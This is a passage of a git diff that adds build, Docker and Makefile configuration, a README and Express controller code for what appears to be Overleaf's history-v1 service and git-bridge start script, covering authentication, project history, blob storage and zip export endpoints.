@@ +#!/bin/sh + +/opt/envsubst < /envsubst_template.json > /conf/runtime.json + +VERSION=$(date +%y%m%d%H%M%S) + +if [ -z "$GIT_BRIDGE_JVM_ARGS" ]; then + GIT_BRIDGE_JVM_ARGS="-XX:+UseContainerSupport -XX:MaxRAMPercentage=50.0" +fi + +if [ "$ENABLE_PROFILE_AGENT" = "true" ]; then + GIT_BRIDGE_JVM_ARGS="-agentpath:/opt/cprof/profiler_java_agent.so=-cprof_service=git-bridge,-cprof_service_version=${VERSION},-cprof_enable_heap_sampling=true ${GIT_BRIDGE_JVM_ARGS}" +fi + +exec java $GIT_BRIDGE_JVM_ARGS -jar /git-bridge.jar /conf/runtime.json diff --git a/services/git-bridge/vendor/envsubst b/services/git-bridge/vendor/envsubst new file mode 100755 index 0000000..f7ad808 Binary files /dev/null and b/services/git-bridge/vendor/envsubst differ diff --git a/services/history-v1/.gitignore b/services/history-v1/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/services/history-v1/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/services/history-v1/.mocharc.json b/services/history-v1/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/history-v1/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/history-v1/.nvmrc b/services/history-v1/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/history-v1/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/history-v1/Dockerfile b/services/history-v1/Dockerfile new file mode 100644 index 0000000..0aa6a2f --- /dev/null +++ b/services/history-v1/Dockerfile @@ -0,0 +1,32 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/history-v1 +COPY services/history-v1/install_deps.sh /overleaf/services/history-v1/ +RUN chmod 0755 ./install_deps.sh && ./install_deps.sh + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +# fs persistor needs a writable folder as a target for the mounted volume +RUN mkdir /buckets && chown node:node /buckets + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/history-v1/package.json /overleaf/services/history-v1/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/history-v1/ /overleaf/services/history-v1/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/history-v1/Makefile b/services/history-v1/Makefile new file mode 100644 index 0000000..1f03a21 --- /dev/null +++ b/services/history-v1/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = history-v1 +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/history-v1/README.md b/services/history-v1/README.md new file mode 100644 index 0000000..9591159 --- /dev/null +++ b/services/history-v1/README.md @@ -0,0 +1,51 @@ +## Database migrations + +The history service uses knex to manage PostgreSQL migrations. + +To create a new migrations, run: +``` +npx knex migrate:make migration_name +``` + +To apply migrations, run: +``` +npx knex migrate:latest +``` + +For more information, consult the [knex migrations +guide](https://knexjs.org/guide/migrations.html#migration-cli). + +## Global blobs + +Global blobs are blobs that are shared between projects. 
+## Global blobs
+
+Global blobs are blobs that are shared between projects. The list of global
+blobs is stored in the projectHistoryGlobalBlobs Mongo collection and is read
+when the service starts. Changing the list of global blobs needs to be done
+carefully.
+
+### Adding a blob to the global blobs list
+
+If we identify a blob that appears in many projects, we might want to move that
+blob to the global blobs list.
+
+1. Add a record for the blob to the projectHistoryGlobalBlobs collection.
+2. Restart the history service.
+3. Delete any corresponding project blobs.
+
+### Removing a blob from the global blobs list
+
+Removing a blob from the global blobs list is trickier. As soon as the global
+blob is made unavailable, every project that needs the blob will have to get
+its own copy. To avoid disruptions, follow these steps:
+
+1. In the projectHistoryGlobalBlobs collection, set the `demoted` property to
+   `true` on the global blob to remove. This will make the history system
+   write new instances of this blob to project blobs, but still read from the
+   global blob.
+
+2. Restart the history service.
+
+3. Copy the blob to all projects that need it.
+
+4. Remove the blob from the projectHistoryGlobalBlobs collection.
+
+5. Restart the history service.
diff --git a/services/history-v1/api/app/security.js b/services/history-v1/api/app/security.js
new file mode 100644
index 0000000..08d6f03
--- /dev/null
+++ b/services/history-v1/api/app/security.js
@@ -0,0 +1,149 @@
+'use strict'
+
+const basicAuth = require('basic-auth')
+const config = require('config')
+const HTTPStatus = require('http-status')
+const jwt = require('jsonwebtoken')
+const tsscmp = require('tsscmp')
+
+function setupBasicHttpAuthForSwaggerDocs(app) {
+  app.use('/docs', function (req, res, next) {
+    if (hasValidBasicAuthCredentials(req)) {
+      return next()
+    }
+
+    res.header('WWW-Authenticate', 'Basic realm="Application"')
+    res.status(HTTPStatus.UNAUTHORIZED).end()
+  })
+}
+
+exports.setupBasicHttpAuthForSwaggerDocs = setupBasicHttpAuthForSwaggerDocs
+
+function hasValidBasicAuthCredentials(req) {
+  const credentials = basicAuth(req)
+  if (!credentials) return false
+
+  // No security in the name, so just use straight comparison.
+  if (credentials.name !== 'staging') return false
+
+  const password = config.get('basicHttpAuth.password')
+  if (password && tsscmp(credentials.pass, password)) return true
+
+  // Support an old password so we can change the password without downtime.
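+  // (Rotation sketch: set basicHttpAuth.oldPassword to the current secret,
+  // roll out the new basicHttpAuth.password, then remove oldPassword once
+  // every caller has switched.)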
+ if (config.has('basicHttpAuth.oldPassword')) { + const oldPassword = config.get('basicHttpAuth.oldPassword') + if (oldPassword && tsscmp(credentials.pass, oldPassword)) return true + } + + return false +} + +function setupSSL(app) { + const httpsOnly = config.get('httpsOnly') === 'true' + if (!httpsOnly) { + return + } + app.enable('trust proxy') + app.use(function (req, res, next) { + if (req.protocol === 'https') { + next() + return + } + if (req.method === 'GET' || req.method === 'HEAD') { + res.redirect('https://' + req.headers.host + req.url) + } else { + res + .status(HTTPStatus.FORBIDDEN) + .send('Please use HTTPS when submitting data to this server.') + } + }) +} + +exports.setupSSL = setupSSL + +function handleJWTAuth(req, authOrSecDef, scopesOrApiKey, next) { + // as a temporary solution, to make the OT demo still work + // this handler will also check for basic authorization + if (hasValidBasicAuthCredentials(req)) { + return next() + } + let token, err + if (authOrSecDef.name === 'token') { + token = req.query.token + } else if ( + req.headers.authorization && + req.headers.authorization.split(' ')[0] === 'Bearer' + ) { + token = req.headers.authorization.split(' ')[1] + } + if (!token) { + err = new Error('jwt missing') + err.statusCode = HTTPStatus.UNAUTHORIZED + err.headers = { 'WWW-Authenticate': 'Bearer' } + return next(err) + } + let decoded + try { + decoded = decodeJWT(token) + } catch (error) { + if ( + error instanceof jwt.JsonWebTokenError || + error instanceof jwt.TokenExpiredError + ) { + err = new Error(error.message) + err.statusCode = HTTPStatus.UNAUTHORIZED + err.headers = { 'WWW-Authenticate': 'Bearer error="invalid_token"' } + return next(err) + } + throw error + } + if (decoded.project_id.toString() !== req.swagger.params.project_id.value) { + err = new Error('Wrong project_id') + err.statusCode = HTTPStatus.FORBIDDEN + return next(err) + } + next() +} + +exports.hasValidBasicAuthCredentials = hasValidBasicAuthCredentials + +/** + * Verify and decode the given JSON Web Token + */ +function decodeJWT(token) { + const key = config.get('jwtAuth.key') + const algorithm = config.get('jwtAuth.algorithm') + try { + return jwt.verify(token, key, { algorithms: [algorithm] }) + } catch (err) { + // Support an old key so we can change the key without downtime. 
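+    // (Same rotation pattern as the HTTP password above: tokens signed with
+    // jwtAuth.oldKey keep verifying, with the same algorithm, until the old
+    // key is removed from the config.)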
+ if (config.has('jwtAuth.oldKey')) { + const oldKey = config.get('jwtAuth.oldKey') + return jwt.verify(token, oldKey, { algorithms: [algorithm] }) + } else { + throw err + } + } +} +function handleBasicAuth(req, authOrSecDef, scopesOrApiKey, next) { + if (hasValidBasicAuthCredentials(req)) { + return next() + } + const error = new Error() + error.statusCode = HTTPStatus.UNAUTHORIZED + error.headers = { 'WWW-Authenticate': 'Basic realm="Application"' } + return next(error) +} + +function getSwaggerHandlers() { + const handlers = {} + if (!config.has('jwtAuth.key') || !config.has('basicHttpAuth.password')) { + throw new Error('missing authentication env vars') + } + handlers.jwt = handleJWTAuth + handlers.basic = handleBasicAuth + handlers.token = handleJWTAuth + return handlers +} + +exports.getSwaggerHandlers = getSwaggerHandlers diff --git a/services/history-v1/api/controllers/expressify.js b/services/history-v1/api/controllers/expressify.js new file mode 100644 index 0000000..5eee15f --- /dev/null +++ b/services/history-v1/api/controllers/expressify.js @@ -0,0 +1,10 @@ +/** + * Turn an async function into an Express middleware + */ +function expressify(fn) { + return (req, res, next) => { + fn(req, res, next).catch(next) + } +} + +module.exports = expressify diff --git a/services/history-v1/api/controllers/health_checks.js b/services/history-v1/api/controllers/health_checks.js new file mode 100644 index 0000000..e9f7176 --- /dev/null +++ b/services/history-v1/api/controllers/health_checks.js @@ -0,0 +1,23 @@ +const logger = require('@overleaf/logger') +const expressify = require('./expressify') +const { mongodb } = require('../../storage') + +async function status(req, res) { + try { + await mongodb.db.command({ ping: 1 }) + } catch (err) { + logger.warn({ err }, 'Lost connection with MongoDB') + res.status(500).send('Lost connection with MongoDB') + return + } + res.send('history-v1 is up') +} + +function healthCheck(req, res) { + res.send('OK') +} + +module.exports = { + status: expressify(status), + healthCheck, +} diff --git a/services/history-v1/api/controllers/project_import.js b/services/history-v1/api/controllers/project_import.js new file mode 100644 index 0000000..5dec84d --- /dev/null +++ b/services/history-v1/api/controllers/project_import.js @@ -0,0 +1,141 @@ +// @ts-check + +'use strict' + +const { expressify } = require('@overleaf/promise-utils') + +const HTTPStatus = require('http-status') + +const core = require('overleaf-editor-core') +const Change = core.Change +const Chunk = core.Chunk +const File = core.File +const FileMap = core.FileMap +const Snapshot = core.Snapshot +const TextOperation = core.TextOperation + +const logger = require('@overleaf/logger') + +const storage = require('../../storage') +const BatchBlobStore = storage.BatchBlobStore +const BlobStore = storage.BlobStore +const chunkStore = storage.chunkStore +const HashCheckBlobStore = storage.HashCheckBlobStore +const persistChanges = storage.persistChanges +const InvalidChangeError = storage.InvalidChangeError + +const render = require('./render') + +async function importSnapshot(req, res) { + const projectId = req.swagger.params.project_id.value + const rawSnapshot = req.swagger.params.snapshot.value + + let snapshot + + try { + snapshot = Snapshot.fromRaw(rawSnapshot) + } catch (err) { + return render.unprocessableEntity(res) + } + + let historyId + try { + historyId = await chunkStore.initializeProject(projectId, snapshot) + } catch (err) { + if (err instanceof chunkStore.AlreadyInitialized) { + 
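+      // A project's history can only be initialized once; a repeated
+      // snapshot import is reported as 409 Conflict rather than overwriting
+      // the existing history.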
return render.conflict(res) + } else { + throw err + } + } + + res.status(HTTPStatus.OK).json({ projectId: historyId }) +} + +async function importChanges(req, res, next) { + const projectId = req.swagger.params.project_id.value + const rawChanges = req.swagger.params.changes.value + const endVersion = req.swagger.params.end_version.value + const returnSnapshot = req.swagger.params.return_snapshot.value || 'none' + + let changes + + try { + changes = rawChanges.map(Change.fromRaw) + } catch (err) { + logger.warn({ err, projectId }, 'failed to parse changes') + return render.unprocessableEntity(res) + } + + // Set limits to force us to persist all of the changes. + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + const limits = { + maxChanges: 0, + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + + const blobStore = new BlobStore(projectId) + const batchBlobStore = new BatchBlobStore(blobStore) + const hashCheckBlobStore = new HashCheckBlobStore(blobStore) + + async function loadFiles() { + const blobHashes = new Set() + for (const change of changes) { + // This populates the set blobHashes with blobs referred to in the change + change.findBlobHashes(blobHashes) + } + + await batchBlobStore.preload(Array.from(blobHashes)) + + for (const change of changes) { + await change.loadFiles('lazy', batchBlobStore) + } + } + + async function buildResultSnapshot(resultChunk) { + const chunk = resultChunk || (await chunkStore.loadLatest(projectId)) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges()) + const rawSnapshot = await snapshot.store(hashCheckBlobStore) + return rawSnapshot + } + + await loadFiles() + + let result + try { + result = await persistChanges(projectId, changes, limits, endVersion) + } catch (err) { + if ( + err instanceof Chunk.ConflictingEndVersion || + err instanceof TextOperation.UnprocessableError || + err instanceof File.NotEditableError || + err instanceof FileMap.PathnameError || + err instanceof Snapshot.EditMissingFileError || + err instanceof chunkStore.ChunkVersionConflictError || + err instanceof InvalidChangeError + ) { + // If we failed to apply operations, that's probably because they were + // invalid. 
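+      // Each of these error types marks a malformed or inapplicable change
+      // (conflicting end version, uneditable file, bad pathname, ...), so
+      // the client gets a 422 rather than a 5xx.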
+ logger.warn({ err, projectId, endVersion }, 'changes rejected by history') + return render.unprocessableEntity(res) + } else if (err instanceof Chunk.NotFoundError) { + logger.warn({ err, projectId }, 'chunk not found') + return render.notFound(res) + } else { + throw err + } + } + + if (returnSnapshot === 'none') { + res.status(HTTPStatus.CREATED).json({}) + } else { + const rawSnapshot = await buildResultSnapshot(result && result.currentChunk) + res.status(HTTPStatus.CREATED).json(rawSnapshot) + } +} + +exports.importSnapshot = expressify(importSnapshot) +exports.importChanges = expressify(importChanges) diff --git a/services/history-v1/api/controllers/projects.js b/services/history-v1/api/controllers/projects.js new file mode 100644 index 0000000..6770758 --- /dev/null +++ b/services/history-v1/api/controllers/projects.js @@ -0,0 +1,388 @@ +'use strict' + +const _ = require('lodash') +const Path = require('node:path') +const Stream = require('node:stream') +const HTTPStatus = require('http-status') +const fs = require('node:fs') +const { promisify } = require('node:util') +const config = require('config') +const OError = require('@overleaf/o-error') + +const logger = require('@overleaf/logger') +const { Chunk, ChunkResponse, Blob } = require('overleaf-editor-core') +const { + BlobStore, + blobHash, + chunkStore, + HashCheckBlobStore, + ProjectArchive, + zipStore, + chunkBuffer, +} = require('../../storage') + +const render = require('./render') +const expressify = require('./expressify') +const withTmpDir = require('./with_tmp_dir') +const StreamSizeLimit = require('./stream_size_limit') + +const pipeline = promisify(Stream.pipeline) + +async function initializeProject(req, res, next) { + let projectId = req.swagger.params.body.value.projectId + try { + projectId = await chunkStore.initializeProject(projectId) + res.status(HTTPStatus.OK).json({ projectId }) + } catch (err) { + if (err instanceof chunkStore.AlreadyInitialized) { + render.conflict(res) + } else { + throw err + } + } +} + +async function getLatestContent(req, res, next) { + const projectId = req.swagger.params.project_id.value + const blobStore = new BlobStore(projectId) + const chunk = await chunkBuffer.loadLatest(projectId) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges()) + await snapshot.loadFiles('eager', blobStore) + res.json(snapshot.toRaw()) +} + +async function getContentAtVersion(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + const blobStore = new BlobStore(projectId) + const snapshot = await getSnapshotAtVersion(projectId, version) + await snapshot.loadFiles('eager', blobStore) + res.json(snapshot.toRaw()) +} + +async function getLatestHashedContent(req, res, next) { + const projectId = req.swagger.params.project_id.value + const blobStore = new HashCheckBlobStore(new BlobStore(projectId)) + const chunk = await chunkBuffer.loadLatest(projectId) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges()) + await snapshot.loadFiles('eager', blobStore) + const rawSnapshot = await snapshot.store(blobStore) + res.json(rawSnapshot) +} + +async function getLatestHistory(req, res, next) { + const projectId = req.swagger.params.project_id.value + try { + const chunk = await chunkBuffer.loadLatest(projectId) + const chunkResponse = new ChunkResponse(chunk) + res.json(chunkResponse.toRaw()) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw 
err + } + } +} + +async function getLatestHistoryRaw(req, res, next) { + const projectId = req.swagger.params.project_id.value + const readOnly = req.swagger.params.readOnly.value + try { + const { startVersion, endVersion, endTimestamp } = + await chunkStore.loadLatestRaw(projectId, { readOnly }) + res.json({ + startVersion, + endVersion, + endTimestamp, + }) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +async function getHistory(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + try { + const chunk = await chunkStore.loadAtVersion(projectId, version) + const chunkResponse = new ChunkResponse(chunk) + res.json(chunkResponse.toRaw()) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +async function getHistoryBefore(req, res, next) { + const projectId = req.swagger.params.project_id.value + const timestamp = req.swagger.params.timestamp.value + try { + const chunk = await chunkStore.loadAtTimestamp(projectId, timestamp) + const chunkResponse = new ChunkResponse(chunk) + res.json(chunkResponse.toRaw()) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + throw err + } + } +} + +/** + * Get all changes since the beginning of history or since a given version + */ +async function getChanges(req, res, next) { + const projectId = req.swagger.params.project_id.value + const since = req.swagger.params.since.value ?? 0 + + if (since < 0) { + // Negative values would cause an infinite loop + return res.status(400).json({ + error: `Version out of bounds: ${since}`, + }) + } + + const changes = [] + let chunk = await chunkBuffer.loadLatest(projectId) + + if (since > chunk.getEndVersion()) { + return res.status(400).json({ + error: `Version out of bounds: ${since}`, + }) + } + + // Fetch all chunks that come after the chunk that contains the start version + while (chunk.getStartVersion() > since) { + const changesInChunk = chunk.getChanges() + changes.unshift(...changesInChunk) + chunk = await chunkStore.loadAtVersion(projectId, chunk.getStartVersion()) + } + + // Extract the relevant changes from the chunk that contains the start version + const changesInChunk = chunk + .getChanges() + .slice(since - chunk.getStartVersion()) + changes.unshift(...changesInChunk) + + res.json(changes.map(change => change.toRaw())) +} + +async function getZip(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + const blobStore = new BlobStore(projectId) + + let snapshot + try { + snapshot = await getSnapshotAtVersion(projectId, version) + } catch (err) { + if (err instanceof Chunk.NotFoundError) { + return render.notFound(res) + } else { + throw err + } + } + + await withTmpDir('get-zip-', async tmpDir => { + const tmpFilename = Path.join(tmpDir, 'project.zip') + const archive = new ProjectArchive(snapshot) + await archive.writeZip(blobStore, tmpFilename) + res.set('Content-Type', 'application/octet-stream') + res.set('Content-Disposition', 'attachment; filename=project.zip') + const stream = fs.createReadStream(tmpFilename) + await pipeline(stream, res) + }) +} + +async function createZip(req, res, next) { + const projectId = req.swagger.params.project_id.value + const version = req.swagger.params.version.value + try { + const snapshot = await getSnapshotAtVersion(projectId, version) + 
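+    // The signed URL can be returned immediately: the zip itself is written
+    // by the background storeZip call below, and clients poll the URL until
+    // the archive appears.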
const zipUrl = await zipStore.getSignedUrl(projectId, version) + // Do not await this; run it in the background. + zipStore.storeZip(projectId, version, snapshot).catch(err => { + logger.error({ err, projectId, version }, 'createZip: storeZip failed') + }) + res.status(HTTPStatus.OK).json({ zipUrl }) + } catch (error) { + if (error instanceof Chunk.NotFoundError) { + render.notFound(res) + } else { + next(error) + } + } +} + +async function deleteProject(req, res, next) { + const projectId = req.swagger.params.project_id.value + const blobStore = new BlobStore(projectId) + await Promise.all([ + chunkStore.deleteProjectChunks(projectId), + blobStore.deleteBlobs(), + ]) + res.status(HTTPStatus.NO_CONTENT).send() +} + +async function createProjectBlob(req, res, next) { + const projectId = req.swagger.params.project_id.value + const expectedHash = req.swagger.params.hash.value + const maxUploadSize = parseInt(config.get('maxFileUploadSize'), 10) + + await withTmpDir('blob-', async tmpDir => { + const tmpPath = Path.join(tmpDir, 'content') + const sizeLimit = new StreamSizeLimit(maxUploadSize) + await pipeline(req, sizeLimit, fs.createWriteStream(tmpPath)) + if (sizeLimit.sizeLimitExceeded) { + return render.requestEntityTooLarge(res) + } + const hash = await blobHash.fromFile(tmpPath) + if (hash !== expectedHash) { + logger.debug({ hash, expectedHash }, 'Hash mismatch') + return render.conflict(res, 'File hash mismatch') + } + + const blobStore = new BlobStore(projectId) + const newBlob = await blobStore.putFile(tmpPath) + + try { + const { backupBlob } = await import('../../storage/lib/backupBlob.mjs') + await backupBlob(projectId, newBlob, tmpPath) + } catch (error) { + logger.warn({ error, projectId, hash }, 'Failed to backup blob') + } + res.status(HTTPStatus.CREATED).end() + }) +} + +async function headProjectBlob(req, res) { + const projectId = req.swagger.params.project_id.value + const hash = req.swagger.params.hash.value + + const blobStore = new BlobStore(projectId) + const blob = await blobStore.getBlob(hash) + if (blob) { + res.set('Content-Length', blob.getByteLength()) + res.status(200).end() + } else { + res.status(404).end() + } +} + +// Support simple, singular ranges starting from zero only, up-to 2MB = 2_000_000, 7 digits +const RANGE_HEADER = /^bytes=0-(\d{1,7})$/ + +/** + * @param {string} header + * @return {{}|{start: number, end: number}} + * @private + */ +function _getRangeOpts(header) { + if (!header) return {} + const match = header.match(RANGE_HEADER) + if (match) { + const end = parseInt(match[1], 10) + return { start: 0, end } + } + return {} +} + +async function getProjectBlob(req, res, next) { + const projectId = req.swagger.params.project_id.value + const hash = req.swagger.params.hash.value + const opts = _getRangeOpts(req.swagger.params.range.value || '') + + const blobStore = new BlobStore(projectId) + logger.debug({ projectId, hash }, 'getProjectBlob started') + try { + let stream + try { + stream = await blobStore.getStream(hash, opts) + } catch (err) { + if (err instanceof Blob.NotFoundError) { + logger.warn({ projectId, hash }, 'Blob not found') + return res.status(404).end() + } else { + throw err + } + } + res.set('Content-Type', 'application/octet-stream') + try { + await pipeline(stream, res) + } catch (err) { + if (err?.code === 'ERR_STREAM_PREMATURE_CLOSE') { + res.end() + } else { + throw OError.tag(err, 'error transferring stream', { projectId, hash }) + } + } + } finally { + logger.debug({ projectId, hash }, 'getProjectBlob finished') + } +} + 
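+// Copy a blob between projects without streaming it through the client (used
+// when duplicating a project). If the target project already has the blob,
+// including global blobs which are visible to every project, respond with
+// 204 and skip the copy.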
+async function copyProjectBlob(req, res, next) { + const sourceProjectId = req.swagger.params.copyFrom.value + const targetProjectId = req.swagger.params.project_id.value + const blobHash = req.swagger.params.hash.value + // Check that blob exists in source project + const sourceBlobStore = new BlobStore(sourceProjectId) + const targetBlobStore = new BlobStore(targetProjectId) + const [sourceBlob, targetBlob] = await Promise.all([ + sourceBlobStore.getBlob(blobHash), + targetBlobStore.getBlob(blobHash), + ]) + if (!sourceBlob) { + return render.notFound(res) + } + // Exit early if the blob exists in the target project. + // This will also catch global blobs, which always exist. + if (targetBlob) { + return res.status(HTTPStatus.NO_CONTENT).end() + } + // Otherwise, copy blob from source project to target project + await sourceBlobStore.copyBlob(sourceBlob, targetProjectId) + res.status(HTTPStatus.CREATED).end() +} + +async function getSnapshotAtVersion(projectId, version) { + const chunk = await chunkStore.loadAtVersion(projectId, version) + const snapshot = chunk.getSnapshot() + const changes = _.dropRight( + chunk.getChanges(), + chunk.getEndVersion() - version + ) + snapshot.applyAll(changes) + return snapshot +} + +module.exports = { + initializeProject: expressify(initializeProject), + getLatestContent: expressify(getLatestContent), + getContentAtVersion: expressify(getContentAtVersion), + getLatestHashedContent: expressify(getLatestHashedContent), + getLatestPersistedHistory: expressify(getLatestHistory), + getLatestHistory: expressify(getLatestHistory), + getLatestHistoryRaw: expressify(getLatestHistoryRaw), + getHistory: expressify(getHistory), + getHistoryBefore: expressify(getHistoryBefore), + getChanges: expressify(getChanges), + getZip: expressify(getZip), + createZip: expressify(createZip), + deleteProject: expressify(deleteProject), + createProjectBlob: expressify(createProjectBlob), + 